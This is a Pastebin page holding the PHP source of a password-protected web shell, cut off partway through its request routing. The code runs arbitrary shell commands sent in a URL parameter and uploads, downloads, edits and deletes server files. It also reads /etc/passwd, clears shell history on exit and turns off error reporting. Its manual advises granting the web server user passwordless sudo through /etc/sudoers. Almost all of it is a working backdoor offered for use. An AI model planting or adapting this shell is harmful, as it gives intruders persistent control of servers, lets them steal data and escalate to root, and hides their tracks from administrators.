API tools faq
paste
Advertisement
annukaka

php webshell

annukaka
Aug 27th, 2015
284
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 32.48 KB | None | 0 0
raw download clone embed print report
  1. <?php // author : annu
  2.  
  3. /* use sha512 */
  4. /* default password is annu */
  5. $password = "602934ae46b8e162bf200790e6a6bf5c8e960efc1d4adb7b7493a6a32757c28fbd4347a2a2d46f963581283b8da35a17aeda571824970905a4fb30d2132b00dc";
  6.  
  7. /* DISABLE ERRORS */
  8. error_reporting(0);
  9.  
  10. if (basename($_SERVER['REQUEST_URI']) == "favicon.ico") {$my_img = imagecreate( 48, 48 ); $background = imagecolorallocate( $my_img, 70, 180, 255 ); $text_colour = imagecolorallocate( $my_img, 115, 120, 121 ); imagestring($my_img, 8, 3, 13, "SHELL", $text_colour); imagesetthickness ( $my_img, 5 ); header( "Content-type: image/png" ); header("Content-Disposition:inline; filename=favicon.ico"); imagepng( $my_img ); imagecolordeallocate( $line_color ); imagecolordeallocate( $text_color ); imagecolordeallocate( $background ); imagedestroy( $my_img ); die; }
  11. if (basename($_SERVER['REQUEST_URI']) == "lined.css") {
  12. header('Content-Type: text/css');
  13. header("Content-Disposition:inline; filename=lined.css");
  14. echo ".linedwrap {border: 1px solid #c0c0c0;padding: 3px;}
  15. .linedtextarea {padding: 0px;margin: 0px;}
  16. .linedtextarea textarea, .linedwrap .codelines .lineno {font-size: 10pt;font-family: monospace;line-height: normal !important;}
  17. .linedtextarea textarea {padding-right:0.3em;padding-top:0.3em;border: 0;}
  18. .linedwrap .lines {margin-top: 0px;width: 50px;float: left;overflow: hidden;border-right: 1px solid #c0c0c0;margin-right: 10px;}
  19. .linedwrap .codelines {padding-top: 5px;}
  20. .linedwrap .codelines .lineno {color:#AAAAAA;padding-right: 0.5em;padding-top: 0.0em;text-align: right;white-space: nowrap;}
  21. .linedwrap .codelines .lineselect {color: red;}
  22. ";
  23. die;
  24. }
  25. if (basename($_SERVER['REQUEST_URI']) == "lined.js") {
  26. header('Content-Type: application/javascript');
  27. header("Content-Disposition:inline; filename=lined.js");
  28. echo "/**
  29. * jQuery Lined Textarea Plugin
  30. *   http://alan.blog-city.com/jquerylinedtextarea.htm
  31. *
  32. * Copyright (c) 2010 Alan Williamson
  33. *
  34. * Version:
  35. *    \$Id: jquery-linedtextarea.js 464 2010-01-08 10:36:33Z alan \$
  36. *
  37. * Released under the MIT License:
  38. *    http://www.opensource.org/licenses/mit-license.php
  39. *
  40. * Usage:
  41. *   Displays a line number count column to the left of the textarea
  42. *  
  43. *   Class up your textarea with a given class, or target it directly
  44. *   with JQuery Selectors
  45. *  
  46. *   \$(\".lined\").linedtextarea({
  47. *      selectedLine: 10,
  48. *    selectedClass: 'lineselect'
  49. *   });
  50. *
  51. * History:
  52. *   - 2010.01.08: Fixed a Google Chrome layout problem
  53. *   - 2010.01.07: Refactored code for speed/readability; Fixed horizontal sizing
  54. *   - 2010.01.06: Initial Release
  55. *
  56. */
  57. (function(\$) {
  58.  
  59.        \$.fn.linedtextarea = function(options) {
  60.              
  61.                // Get the Options
  62.                var opts = \$.extend({}, \$.fn.linedtextarea.defaults, options);
  63.              
  64.              
  65.                /*
  66.                 * Helper function to make sure the line numbers are always
  67.                 * kept up to the current system
  68.                 */
  69.                var fillOutLines = function(codeLines, h, lineNo){
  70.                        while ( (codeLines.height() - h ) <= 0 ){
  71.                                if ( lineNo == opts.selectedLine )
  72.                                        codeLines.append(\"<div class='lineno lineselect'>\" + lineNo + \"</div>\");
  73.                                else
  74.                                        codeLines.append(\"<div class='lineno'>\" + lineNo + \"</div>\");
  75.                              
  76.                                lineNo++;
  77.                        }
  78.                        return lineNo;
  79.                };
  80.              
  81.              
  82.                /*
  83.                 * Iterate through each of the elements are to be applied to
  84.                 */
  85.                return this.each(function() {
  86.                        var lineNo = 1;
  87.                        var textarea = \$(this);
  88.                      
  89.                        /* Turn off the wrapping of as we don't want to screw up the line numbers */
  90.                        textarea.attr(\"wrap\", \"off\");
  91.                        textarea.css({resize:'none'});
  92.                        var originalTextAreaWidth       = textarea.outerWidth();
  93.  
  94.                        /* Wrap the text area in the elements we need */
  95.                        textarea.wrap(\"<div class='linedtextarea'></div>\");
  96.                        var linedTextAreaDiv    = textarea.parent().wrap(\"<div class='linedwrap' style='width:\" + originalTextAreaWidth + \"px'></div>\");
  97.                        var linedWrapDiv                        = linedTextAreaDiv.parent();
  98.                      
  99.                        linedWrapDiv.prepend(\"<div class='lines' style='width:50px'></div>\");
  100.                      
  101.                        var linesDiv    = linedWrapDiv.find(\".lines\");
  102.                        linesDiv.height( textarea.height() + 6 );
  103.                      
  104.                      
  105.                        /* Draw the number bar; filling it out where necessary */
  106.                        linesDiv.append( \"<div class='codelines'></div>\" );
  107.                        var codeLinesDiv        = linesDiv.find(\".codelines\");
  108.                        lineNo = fillOutLines( codeLinesDiv, linesDiv.height(), 1 );
  109.  
  110.                        /* Move the textarea to the selected line */
  111.                        if ( opts.selectedLine != -1 && !isNaN(opts.selectedLine) ){
  112.                                var fontSize = parseInt( textarea.height() / (lineNo-2) );
  113.                                var position = parseInt( fontSize * opts.selectedLine ) - (textarea.height()/2);
  114.                                textarea[0].scrollTop = position;
  115.                        }
  116.  
  117.                      
  118.                        /* Set the width */
  119.                        var sidebarWidth                                        = linesDiv.outerWidth();
  120.                        var paddingHorizontal           = parseInt( linedWrapDiv.css(\"border-left-width\") ) + parseInt( linedWrapDiv.css(\"border-right-width\") ) + parseInt( linedWrapDiv.css(\"padding-left\") ) + parseInt( linedWrapDiv.css(\"padding-right\") );
  121.                        var linedWrapDivNewWidth        = originalTextAreaWidth - paddingHorizontal;
  122.                        var textareaNewWidth                    = originalTextAreaWidth - sidebarWidth - paddingHorizontal - 20;
  123.  
  124.                        textarea.width( textareaNewWidth );
  125.                        linedWrapDiv.width( linedWrapDivNewWidth );
  126.                      
  127.  
  128.                      
  129.                        /* React to the scroll event */
  130.                        textarea.scroll( function(tn){
  131.                                var domTextArea         = \$(this)[0];
  132.                                var scrollTop           = domTextArea.scrollTop;
  133.                                var clientHeight        = domTextArea.clientHeight;
  134.                                codeLinesDiv.css( {'margin-top': (-1*scrollTop) + \"px\"} );
  135.                                lineNo = fillOutLines( codeLinesDiv, scrollTop + clientHeight, lineNo );
  136.                        });
  137.  
  138.  
  139.                        /* Should the textarea get resized outside of our control */
  140.                        textarea.resize( function(tn){
  141.                                var domTextArea = \$(this)[0];
  142.                                linesDiv.height( domTextArea.clientHeight + 6 );
  143.                        });
  144.  
  145.                });
  146.        };
  147.  
  148. // default options
  149. \$.fn.linedtextarea.defaults = {
  150.        selectedLine: -1,
  151.        selectedClass: 'lineselect'
  152. };
  153. })(jQuery);";
  154. die;
  155. }
  156.  
  157. /* FUNCTIONS */
  158. function ds($dir=''){if (!match("\/$", $dir)) $dir = $dir . "/";return $dir;}
  159. function line($line='') {return str_replace("\n","",$line); }
  160. function ip($value='') {if (!empty($_SERVER['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {$ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else {$ip = $_SERVER['REMOTE_ADDR']; } return $ip; }
  161. function ahash($text='', $salt='',$sum=0) {if (!is_int($sum)) {$sum = 0; } $md5_salt = md5($salt); $md5_text = md5($text); $hash = hash('sha512',$md5_salt . $md5_text); $data  = array('md5_salt' => $md5_salt, 'md5_text' => $md5_text, 'hash'=>$hash); if (!$sum == 0) {$hash = preg_replace("/^(.{".$sum."}).*/i", '$1', $hash); } return $hash; }
  162. function ex($cmd='') {return shell_exec("$cmd 2>&1"); }
  163. function exl($cmd='') {return line(ex("$cmd"));}
  164. function a($text='',$link = '') {return "<a href = '$link'>$text</a>"; }
  165. function me($get='') {if($get!=''){$get = "?$get";}return $_SERVER['PHP_SELF'].$get; }
  166. function noslash($dir='') {return replace("\/$","",$dir); }
  167. function root($path='') {if(!match("^\/",$path))$path = "$GLOBALS[active_dir]$path";return $path; }
  168. function backslashes($text='') {$arr = array("/"," "); foreach ($arr as $key => $value) {$text = str_replace($value, "\/", $text); } return $text; }
  169. function readf($file='') {$myfile = fopen($file, "r"); $read = fgets($myfile); fclose($myfile); return $read; }
  170. function writef($file='',$text='') {$myfile = fopen($file, "w"); fwrite($myfile, $text); fclose($myfile); return true; }
  171. function isexists($file=''){$is_exists= "\#!/bin/bash\nif test -f \"$file\"\n then\n echo 1\n else\n echo 0\n fi\n"; return exl("chmod 755 $is_exists; ".root($is_exists)); }
  172. function iswriteable($file=''){$is_writeable= "\#!/bin/bash\nif test -w \"$file\"\n then\n echo 1\n else\n echo 0\n fi\n"; return exl("chmod 755 $is_writeable; ".root($is_writeable)); }
  173. function isreadable($file=''){$is_readable= "\#!/bin/bash\nif test -r \"$file\"\n then\n echo 1\n else\n echo 0\n fi\n";return exl("chmod 755 $is_readable; ".root($is_readable)); }
  174. function isdir($file=''){$is_dir= "\#!/bin/bash\nif test -d \"$file\"\n then\n echo 1\n else\n echo 0\n fi\n";return exl("chmod 755 $is_dir; ".root($is_dir)); }
  175. function replace($pattern='',$replacement = null, $subject = null,$delimitter='ims') {$pattern = str_replace("\/", "/", $pattern); $pattern = backslashes($pattern); return preg_replace("/$pattern/".$delimitter, $replacement, $subject); }
  176. function match($pattern='',$subject = null,$delimitter='ims') {$pattern = str_replace("\/", "/", $pattern); $pattern = backslashes($pattern); return preg_match("/$pattern/".$delimitter, $subject); }
  177. function whattype($file=''){if(isexists($file)) {$shell = "file -i \"".root($file)."\""; $ex = exl($shell); $type = preg_replace("/[^\040]+:\040([a-z]+\/[a-z-_]+).+/i","$1", $ex); return $type; }}
  178. function gwords($array_words='',$c_words =0){$c_word = count($array_words); $c_wordss = $c_word-$c_words; $c_words; $_words = array(); var_dump($array_words); for ($i_wordss=0; $i_wordss <= $c_wordss; $i_wordss++) {for ($i_words=0; $i_words <= $c_words; $i_words++) {$word_position = $i_words + $i_wordss; $_words[$i_wordss] .= $array_words[$word_position] ." "; } } return $_words; }
  179. function tfile($file){;$tmp_path = $GLOBALS['tmp_path'];return replace("\/$","",$tmp_path) . ahash(basename($file).".".basename($file),"nametmp",22); }
  180. function tsess($file){$sess_path = $GLOBALS['sess_path'];return replace("\/$","",$sess_path) . ahash(basename($file).".".basename($file),"namesess",22); }
  181. function islinkin($file='',$target=''){$shell = "\#!/bin/bash\n if [ \"$file\" -ef \"$target\" ];then\n echo 1\n else\n echo 0\n fi\n "; return exl($shell); }
  182. function formlogin(){echo "<form action='' method='post'>WEB SHELL by annu :: <input type='password' name='".ahash("password",date("YmdH"))."' placeholder='password'><button type='submit'>login</button></form>"; die; }
  183.  
  184.  
  185.  /* EXTERNAL COMMAND */
  186. function mycmd($command = null){
  187.         $arr = array(
  188.         "open"=>"open",
  189.         "download"=>"download",
  190.         "down"=>"download",
  191.         "new"=>"new",
  192.         );
  193.         $att = null;
  194.         $cmd = null;
  195.  
  196.         /* DOWNLOAD */
  197.         $download = function ($file = '') use ($att){
  198.                 $tmp_path = $GLOBALS['tmp_path'];
  199.                 $tmp_dir = $GLOBALS['tmp_dir'];
  200.                 $active_dir = $GLOBALS['active_dir'];
  201.                 $script_path = $GLOBALS['script_path'];
  202.                 $script_path_http = $GLOBALS['script_path_http'];
  203.                 $messages = null;
  204.                 $method = $GLOBALS['tmp_method'];
  205.                 $ln_messages = null;
  206.                 $cp_messages = null;
  207.  
  208.                 /* GET FILE NAME */
  209.                 $name = replace("([^\/]+)$", "$1", $file);
  210.  
  211.                 /* GET FILE TYPE */
  212.                 $type = whattype($file);
  213.                
  214.                 /* SET FALSE */
  215.                 $ok = false;
  216.  
  217.                 /* CHECK ON TMP FILE */
  218.                 if (file_exists(tfile($name)))$ok = true;
  219.                 else{                  
  220.                         /* TRY TO LINK */
  221.                         $ln_shell =     "cd $active_dir && ln $file " . ($script_path.tfile($name));
  222.                         $ln_messages = exl($ln_shell);
  223.  
  224.                         /* IF THERE IS AN ERROR THEN TRY CP */
  225.                         if ($ln_messages != null) {
  226.                                 $ln_messages = "\n>> $ln_messages";
  227.                                 $ln_messages .= "\n>> trying plan B :: copy file to $tmp_dir";
  228.                                 $ok = false;
  229.                                 $cp_shell = "cd $active_dir && cp $file " . ($script_path.tfile($name));
  230.                                 $cp_messages = exl($cp_shell);
  231.                                 if ($cp_messages != null) {
  232.                                         $ok = false;
  233.                                         $cp_messages = "\n>> $cp_messages";
  234.                                         $cp_messages .= "\n>> failed to download";
  235.                                 }
  236.                                 else $ok = true;
  237.                         }
  238.                        
  239.                         else $ok = true;
  240.                 }
  241.                 $messages = $ln_messages . $cp_messages;
  242.  
  243.                 /* OK DOWNLOAD IT */
  244.                 if ($ok==true) {
  245.                         header('Content-Type: $type');
  246.                         header("Content-Disposition: attachment; filename=$name");
  247.                         header('Connection: Keep-Alive');
  248.                         header('Expires: 0');
  249.                         header('Pragma: public');
  250.                         readfile(tfile($name));
  251.                         die;
  252.                 }
  253.                 else $GLOBALS['messages'] = "\n$messages\n";
  254.         };
  255.  
  256.         /* OPEN */
  257.         $open = function ($file = '') use ($att){
  258.                 $tmp_path = $GLOBALS['tmp_path'];
  259.                 $tmp_dir = $GLOBALS['tmp_dir'];
  260.                 $active_dir = $GLOBALS['active_dir'];
  261.                 $script_path = $GLOBALS['script_path'];
  262.                 $script_path_http = $GLOBALS['script_path_http'];
  263.                 $messages = null;
  264.  
  265.                 /* GET */
  266.                
  267.                 $array['filename']= basename($file);
  268.                 $array['file']= $file;
  269.                 $array['tmpname']= basename(tfile($file));
  270.                 $array['tmp']= tfile($file);
  271.                 $array["date"]= exl("date -r \"".root($file)."\"");
  272.                 $array["type"]= whattype($file);
  273.                 $array["exists"]= isexists($file);
  274.                 $array["writeable"]= iswriteable($file);
  275.                 $array["readable"]= isreadable($file);
  276.                
  277.                
  278.                 $array['link']= root($file);
  279.  
  280.  
  281.  
  282.                 /* IF READ ABLE */
  283.                 if ($array['readable'] == 1) {
  284.                
  285.  
  286.                         /* CHECK TMP */
  287.                         if (isexists($array['tmp'])) {
  288.                                
  289.                                 if (1 == islinkin($array['tmp'],$file)) {
  290.                                        
  291.                                         $rm = exl("rm $array[tmp]");
  292.                                         $ln_messages = exl("ln -s ".root($file)." $array[tmp]");
  293.                                 }
  294.                                 else{
  295.                                         $rm = exl("rm $array[tmp]");
  296.                                         $ln_messages = exl("ln -s ".root($file)." $array[tmp]");
  297.                                 }
  298.                         }
  299.                         else{
  300.                                         $rm = exl("rm $array[tmp]");
  301.                                         $ln_messages = exl("ln -s ".root($file)." $array[tmp]");
  302.  
  303.  
  304.                         }
  305.                        
  306.                         /* TEXT */
  307.                         $messages .= "\n>> filename : $array[filename] | type : $array[type]";
  308.                         $messages .= "\n>> modificated : $array[date] | writeable : $array[writeable]";
  309.                 }
  310.                 else {
  311.                         $messages = "\n>> the $array[file] is not readable or not exists.";
  312.                 }
  313.                 writef(tsess("open$file"),json_encode($array));
  314.        
  315.                
  316.                 return $messages;
  317.                
  318.  
  319.         };
  320.  
  321.         $new = function ($file = null) use($att){
  322.                 $messages = null;
  323.                 $tmp_path = $GLOBALS['tmp_path'];
  324.                 $tmp_dir = $GLOBALS['tmp_dir'];
  325.                 $active_dir = $GLOBALS['active_dir'];
  326.                 $script_path = $GLOBALS['script_path'];
  327.                 $script_path_http = $GLOBALS['script_path_http'];
  328.                 $messages = null;
  329.                 if (basename($file) == $file){
  330.                        
  331.                         $dir = $active_dir;
  332.                 }
  333.                 else{
  334.                         $dir = replace("^(.+)[^\/]$","$1",$file);
  335.  
  336.                 }
  337.  
  338.  
  339.                 $array['file'] = $file;
  340.                 $array['filename'] = basename($file);
  341.                 $array['writeable'] = 1;
  342.                 $ok = 1;
  343.  
  344.  
  345.                 if(!isexists($file)){
  346.                         $array['exists'] = 0;
  347.                         if(!iswriteable($dir)){
  348.                                 $messages .= "\n>> the directory is not writeable";
  349.                                 $array['writeable'] = 0;
  350.                                 $ok = 0;
  351.                         }
  352.                 }
  353.  
  354.                 else{
  355.                         $messages .= "\n>> the $array[filename] is exists";
  356.                         $array['exists'] = 1;
  357.                         $ok = 0;
  358.                        
  359.                 }      
  360.                 if ($ok==1) {
  361.                         $messages .= "\n>> filename : $array[filename] | directory : $dir";
  362.                 }
  363.  
  364.                 writef(tsess("new$file"),json_encode($array));
  365.                
  366.                 return $messages;
  367.                
  368.         };
  369.  
  370.         /* GET CMD AND ATT */
  371.         foreach ($arr as $key => $value) {
  372.                 $command = htmlspecialchars($command);
  373.                 if (match("^\!(".$key.")", $command)) $cmd = $value;
  374.                 $att = replace("^\!".$key."\s(.+)", "$1", $command);
  375.                 if ($cmd != null)break;
  376.         }
  377.         if ($cmd != null) {$GLOBALS['command'] = $GLOBALS["list"]; return array("cmd" =>$cmd,"att"=>$att, "messages" =>${$cmd}($att));}
  378.         else return false;
  379. }
  380.  
  381. /* VARIABLE */
  382. $dirr= exl("pwd"); /* ACTIVE DIRECTORY */
  383. $me= exl("whoami"); /* WHO AM I */
  384.  
  385. $home_path =  ds(exl("awk -F: -v v='".$me."' '{if ($1==v) print $6}' /etc/passwd")); /* HOME PATH */
  386. $script_path = replace("[^\/]+$", "", $_SERVER['SCRIPT_FILENAME']); /* SCRIPT PATH */
  387. $script_path_http = replace("[^\/]+$", "", $_SERVER['SCRIPT_NAME']); /* SCRIPT PATH ON HTTP */
  388. $http_root = $_SERVER['DOCUMENT_ROOT']; /* HTTP ROOT */
  389. $command = $cd = $sess = $messages = $mv_messages = $html = $updated = $pwd = $ok = $respon = $funRUN = null; /* SET NULLS */
  390. $get = isset($_GET)?$_GET : array();
  391. $command = ($command_real = isset($get['cli'])?$get['cli']:null);
  392.  
  393.  
  394. /* CONFIG VARS */
  395. $sess_dir = $tmp_dir = ds("dsbuf9e0-tmp/"); /*SET TMP DIR AND SESSIONS DIR*/
  396. $arr =
  397. array(
  398. /* alias */
  399. "~" => noslash($home_path),
  400.  
  401. "!and" => "&&",
  402. "!home" => noslash($home_path),
  403. "!php" => noslash($script_path),
  404. "!bs" => "\\",
  405. "!s" => "\/",
  406. "!h" => "#",
  407. "!a" => "\?"
  408. );
  409. $list = "ls -lap"; /* LIST DEFAULT */
  410. $valid_access = 3600; /* HOW LONG SESSION FILES WILL USED & TMP FILES WILL AVIALABLE */
  411. $tmp_method = "ln";
  412. /* START HERE */
  413. $command_real = $command;
  414.  
  415. if (!is_dir($sess_dir)) {mkdir($sess_dir); }
  416. if (!is_dir($tmp_dir)) {mkdir($tmp_dir); }
  417. $sess_path = $sess_dir ."sess". ahash(ip(),"dir",6);
  418. $tmp_name = "tmp". ahash(ip(),"file",6);
  419. $tmp_path = $tmp_dir . "tmp". ahash(ip(),"file",6);
  420.  
  421. /* GETTING COMMANDS */
  422. if ($command == null) /* IF NO COMMAND THEN LIST */
  423.         $command_real = $command = $list;
  424. if (isset($_GET['exit'])){ /* EXIT AND DELETING SESSION */
  425.         $x = exl("rm $sess_path* | rm $tmp_path* | history -c");
  426. }
  427.  
  428. /* ALIASES */
  429. foreach ($arr as $key => $value) {$command = replace("$key", $value, $command); }
  430.  
  431. /* CHECKING SESSION */
  432.  
  433. // echo hash("sha512",$password);
  434.         if (isset($_POST[ahash("password",date("YmdH"))])) {
  435.                 if (hash("sha512",$_POST[ahash("password",date("YmdH"))]) == $password) {
  436.                         writef(tsess("cd"),$active_dir);
  437.                 }
  438.                 else{
  439.                         echo "login failed";
  440.                 }
  441.         }
  442.  
  443.  
  444. if (file_exists(tsess("cd"))) {
  445. $updated = date("Y-m-d H:i:s.", filemtime(tsess("cd")));
  446. $updated = strtotime($updated);
  447. $now = strtotime(date("Y-m-d H:i:s"));
  448. $now;
  449. $diff = $now - $updated;
  450. if ($diff < $valid_access) {
  451.         $cd = readf(tsess("cd"));
  452. }
  453. else{
  454.         $cd = $dirr;
  455.         $remove_old_session_and_tmp = exl("rm $sess_path* | rm $tmp_path*");
  456.         formlogin();
  457. }
  458. }
  459. else {formlogin();}
  460.  
  461.  
  462.  
  463. /* CREATING ACTIVE DIRECTORY AND GENERATING CD COMMAD */
  464. $active_dir = ds(line($cd == null?$dirr:"$cd"));
  465. $cd_command = "cd $active_dir";
  466.  
  467. /* GENERATING PWD COMMAND */
  468. $pwd = "echo '___PWD'; pwd; echo 'PWD___'";
  469.  
  470. /* SHELL SCRIPT */
  471. $shell_script = tfile("shell_script");
  472.  
  473. /* REMOVE THE LAST SHELL SCRIPT */
  474. $rm = ex("rm $shell_script");
  475.  
  476. /* CREATING TMP SHELL FILE */
  477. //$command = preg_replace("/(\\))/i", "\\\\", $command);
  478. $exec_ = "$cd_command;$command".($command==null?"":"; ")."$pwd";
  479. writef($shell_script,$exec_);
  480.  
  481. /* RUN CHMOD */
  482. $chmod = ex("chmod 755 $shell_script");
  483.  
  484. $new_command_ = $command;
  485. preg_match_all('/([^&;\|]+)/i', $command, $result);
  486.  
  487. /* POST */
  488. /* UPLOAD */
  489. if (isset($_FILES["fileToUpload"])) {
  490.         $name = basename($_FILES["fileToUpload"]["name"]);
  491.         $name = $_POST['name']!=null?$_POST['name']:$name;
  492.         if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], tfile("upload".$name))) {
  493.                 $messages .=  "\n>> the file ". $name. " has been uploaded to $tmp_dir. tmp name : ".basename(tfile("upload".$name));
  494.                 if (isexists("$active_dir$name") == 0) {
  495.  
  496.                         /* TRY TO LINK */
  497.                         $ln_shell =     "ln ".tfile("upload$name")." ". root($name);  
  498.                         $ln_messages = exl($ln_shell);
  499.  
  500.                         /* IF THERE IS AN ERROR THEN TRY CP */
  501.                         if ($ln_messages != null) {
  502.                                 $ln_messages .= "\n>> $ln_messages";
  503.                                 $ln_messages .= "\n>> trying plan B :: moving file from $tmp_dir";
  504.                                 $ok = false;
  505.                                 $mv_shell = "mv ".tfile("upload$name")." ". root($name);
  506.                                 $mv_messages = exl($mv_shell);
  507.                                 if ($mv_messages != null) {
  508.                                         $ok = false;
  509.                                         $mv_messages .= "\n>> $mv_messages";
  510.                                         $mv_messages .= "\n>> failed to moving file";
  511.                                 }
  512.                                 else $ok = true;
  513.                         }
  514.                         else $ok = true;
  515.                         $messages .= $ln_messages . $mv_messages;
  516.                         if ($ok ==false) $messages .= "\n>> you can move it from $tmp_dir";
  517.                 }
  518.                 else $messages .= "\n>> file is exists, you can move it from $tmp_dir";        
  519.         }
  520.         else $messages .=  "\n>> sorry, there was an error uploading your file";
  521.         if ($ok == 1) $messages .= "\n>> the file $name has been moved to $active_dir$name";
  522. }
  523. if (isset($_POST)) {
  524.         /* TEXT */
  525.         if (isset($_POST['text'])) {
  526.  
  527.                 if ($_POST['act'] == "open") {
  528.                        
  529.                
  530.                         if (isset($_POST['file'])) {
  531.                                 # code...
  532.                                $json = json_decode(readf(tsess("open".$_POST['file'])));
  533.  
  534.                                 if(isset($json->file)){
  535.                                  $backup =exl ("cp ".$json->file." " .tfile("backup" . $json->filename));
  536.                                
  537.                                 if (isexists(tfile("backup".$json->filename)))
  538.                                         $messages .= "\n>> backup file has been written [".tfile("backup".$json->filename)."]";
  539.                                
  540.                                 else
  541.                                         $messages .= "\n>> ".$backup;
  542.  
  543.                                 /* SAVE */
  544.                                
  545.                                
  546.                                 writef($json->tmp,($_POST['text']));
  547.                                 }
  548.                                 else{
  549.                                         $messages .= "\n>> no data!!!";
  550.                                 }
  551.  
  552.                         }
  553.                 }
  554.                 elseif($_POST['act']="new"){
  555.                         $json = json_decode(readf(tsess("new".$_POST['file'])));
  556.                         /* create file */
  557.                         $createfile = exl("echo \"".htmlspecialchars($_POST['text'])."\" > ". $json->file);
  558.                         if($createfile==null){
  559.                                 header("location:?cli=!open ".$json->file);
  560.                         }
  561.                         else{
  562.                                 $messages .= ">>\n$createfile";
  563.                         }
  564.  
  565.                 }
  566.                 /* BACK UP!!! */
  567.         }
  568.        
  569. }
  570.  
  571.  
  572. /* TAKE OVER IF THERE IS AN EXTERNAL COMMAND */
  573. $respon = mycmd($command);
  574. if (is_array($respon)) {$shell_script = null;$messages .= $respon['messages'];}
  575.  
  576. /* EXCUTE SHELL */
  577. $out = ex($shell_script);
  578.  
  579. /* GETTING THE LAST ACTIVE DIRECTORY */
  580. $last_dir = line($out);
  581. if (match("(.*)___PWD(.+)PWD___", $last_dir)) $last_dir = replace("(.*)___PWD(.+)PWD___", "$2", $last_dir);
  582. else $last_dir = $active_dir;
  583.  
  584. // echo "\n$last_dir";die;
  585.  
  586. /* STORE ACTIVE DIRECTORY TO SESSION FILE */
  587. writef(tsess("cd"),$last_dir);
  588. $active_dir = ds($last_dir);
  589.  
  590. /* DELETING PWD OUTPUT */
  591. $out = replace("(.*)___PWD.*PWD___", "$1", $out);
  592.  
  593. /* HTML */
  594. $text = $text_ = $renameup = null;
  595. if (is_array($respon)) {
  596. if ($respon['cmd'] == "open") {
  597.         # code...
  598.  
  599. $json = json_decode(readf(tsess("open$respon[att]")));
  600.  
  601. if ($json->readable == 1) {
  602. $text_ = ex("cat ". $json->tmp);
  603.  
  604. if (match("(text|inode).*",$json->type)) {
  605.        
  606. $text = "
  607. <form action='?cli=!open ".$json->file."' method='post'>
  608.        <button type='submit' float:left' ".($json->writeable==0?"disabled='disabled'":null).">SAVE</button>
  609.        <input type='hidden' name='file' value='".$json->file."'>
  610.        <input type='hidden' name='act' value='open'>
  611.  
  612.        <a href='?cli=rm ".$json->file."' target='_blank'><button ".($json->writeable==0?"disabled='disabled'":null)." onclick='window.location=\"?cli=rm ".$json->file."\";return false;'>DELETE</button></a>
  613.        <textarea id='lined' class='lined run' name = 'text' style='width:95%;height:65%'>".htmlspecialchars($text_)."</textarea>
  614. </form>
  615. ";
  616. }
  617. if (match("image.*",$json->type)) {$renameup=1;
  618.         $text = "
  619.        <a href='?cli=rm ".$json->file."' target='_blank' >
  620.        <button onclick='window.location=\"?cli=rm ".$json->file."\";return false;' ".($json->writeable==0?"disabled='disabled'":null).">DELETE</button></a>
  621.        <a target='_blank' href='".$json->tmp."?name=".$json->filename."'><img style='max-width:100%' src='".$json->tmp."'></a>";
  622. }
  623. }
  624. }
  625.  
  626. elseif($respon['cmd']=="new"){
  627.         $json = json_decode(readf(tsess("new$respon[att]")));
  628.         $text = "
  629. <form action='' method='post'>
  630.        <button type='submit' float:left'>SAVE</button>
  631.        <input type='hidden' name='file' value='".$json->file."'>
  632.        <input type='hidden' name='act' value='new'>
  633.        <textarea id='lined' class='lined run' name = 'text' style='width:95%;height:65%'></textarea>
  634. </form>
  635. ";
  636. if ($json->exists || !$json->writeable == 1) {
  637.         $messages .= "\n\n".ex("cd $active_dir; " . $list);
  638.         $text = null;
  639. }
  640. }
  641.  
  642. }
  643. $htmlhead = "<link rel=\"shortcut icon\" href=\"$_SERVER[SCRIPT_NAME]/favicon.ico\">";
  644. $htmlhead .= "<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js'></script>";
  645. $htmlhead .= "<script src=\"$_SERVER[SCRIPT_NAME]/lined.js\"></script>";
  646. $htmlhead .= "<link href=\"$_SERVER[SCRIPT_NAME]/lined.css\" type=\"text/css\" rel=\"stylesheet\" />";
  647. $title = "WEB SHELL V0.1alpha";
  648. $head ="<span><b>WEB SHELL v0.1alpha by annu</b></span>";
  649. $link = a("index",me())." | " . a("exit","?exit");
  650. $conn = "<span>$me@$_SERVER[SERVER_NAME]/$_SERVER[SERVER_ADDR] by " . ip() ."</span>";
  651. $current_dir = "<span>$active_dir</span>";
  652. $upload = "
  653. <form action='?cli' method='POST' enctype='multipart/form-data' style='float:left;width:40%'>
  654.        <input type='file' style='width:50%' name='fileToUpload' id='fileToUpload'>
  655.        <input style='width:30%' class='stopfocus' type='text' name = 'name' placeholder='rename' value='".($renameup != null ? $json->filename:null)."'>
  656.        <input type='submit' value='GO' name='submit'>
  657. </form>";
  658. $cli = "
  659. <form action='' style='float:left;width:60%'>
  660.        <input
  661.        autofocus
  662.        type='text'
  663.        id='cli'
  664.        name = 'cli'
  665.        style='width:100%'
  666.        placeholder='type your command here || ENTER -> list files and directories || !down[load?] FILE || !open FILE
  667.                '>
  668. </form>";      
  669. $clearboth = "<div style='clear:both'></div>";
  670.  
  671. $man = "<pre>
  672. [USER]@[HOST]/[IP SERVER] by [YOUR IP]
  673. [ACTIVE DIRECTORY]
  674.  
  675. additional commands:
  676. !down[load?] FILE => download file [all file types]
  677. !open FILE => open file [text,image]
  678. !new FILE => create new file [text]
  679.  
  680. aliases:
  681. ~ = home directory
  682. !s = /
  683. !bs = \
  684. !h = #
  685. !a = ?
  686. !and = &&
  687. !home = home directory
  688. !php = this script directory
  689. you can add aliases by editing this script
  690.  
  691. notes:
  692. - shell_exec() must be enabled
  693. - directory must be writeable
  694. - for ubuntu can use sudo mode by type : echo 'PASSWORD' | sudo -S COMMAND
  695. ; make sure your user is in sudo group
  696. ; if you are www-data then you have to edit /etc/sudoers and add this line: www-data ALL=(ALL) NOPASSWD: ALL
  697.   then you dont have to use password, just type: sudo COMMAND
  698.  
  699. tested on:
  700. Ubuntu 14.04
  701. </pre>";
  702.  
  703. /* WORKING WITH OUTPUT */
  704.  
  705. $out = (line($out)==null) ? $out =htmlspecialchars(ex("$list $active_dir")) : $out;
  706. $shell_script =backslashes($shell_script);
  707. $out = replace("$shell_script:(\040[0-9]+:)?(\040$shell_script:)*", "", $out);
  708. $out = "<pre>>> $command_real$messages
  709. \n$out</pre>";
  710. $open = "<pre>$messages</pre>$clearboth$text";
  711.  
  712.  
  713.  
  714. /* ROUTES */
  715. if (isset($_GET['cli'])) {
  716.         if (is_array($respon))
  717.                 $content = $open;
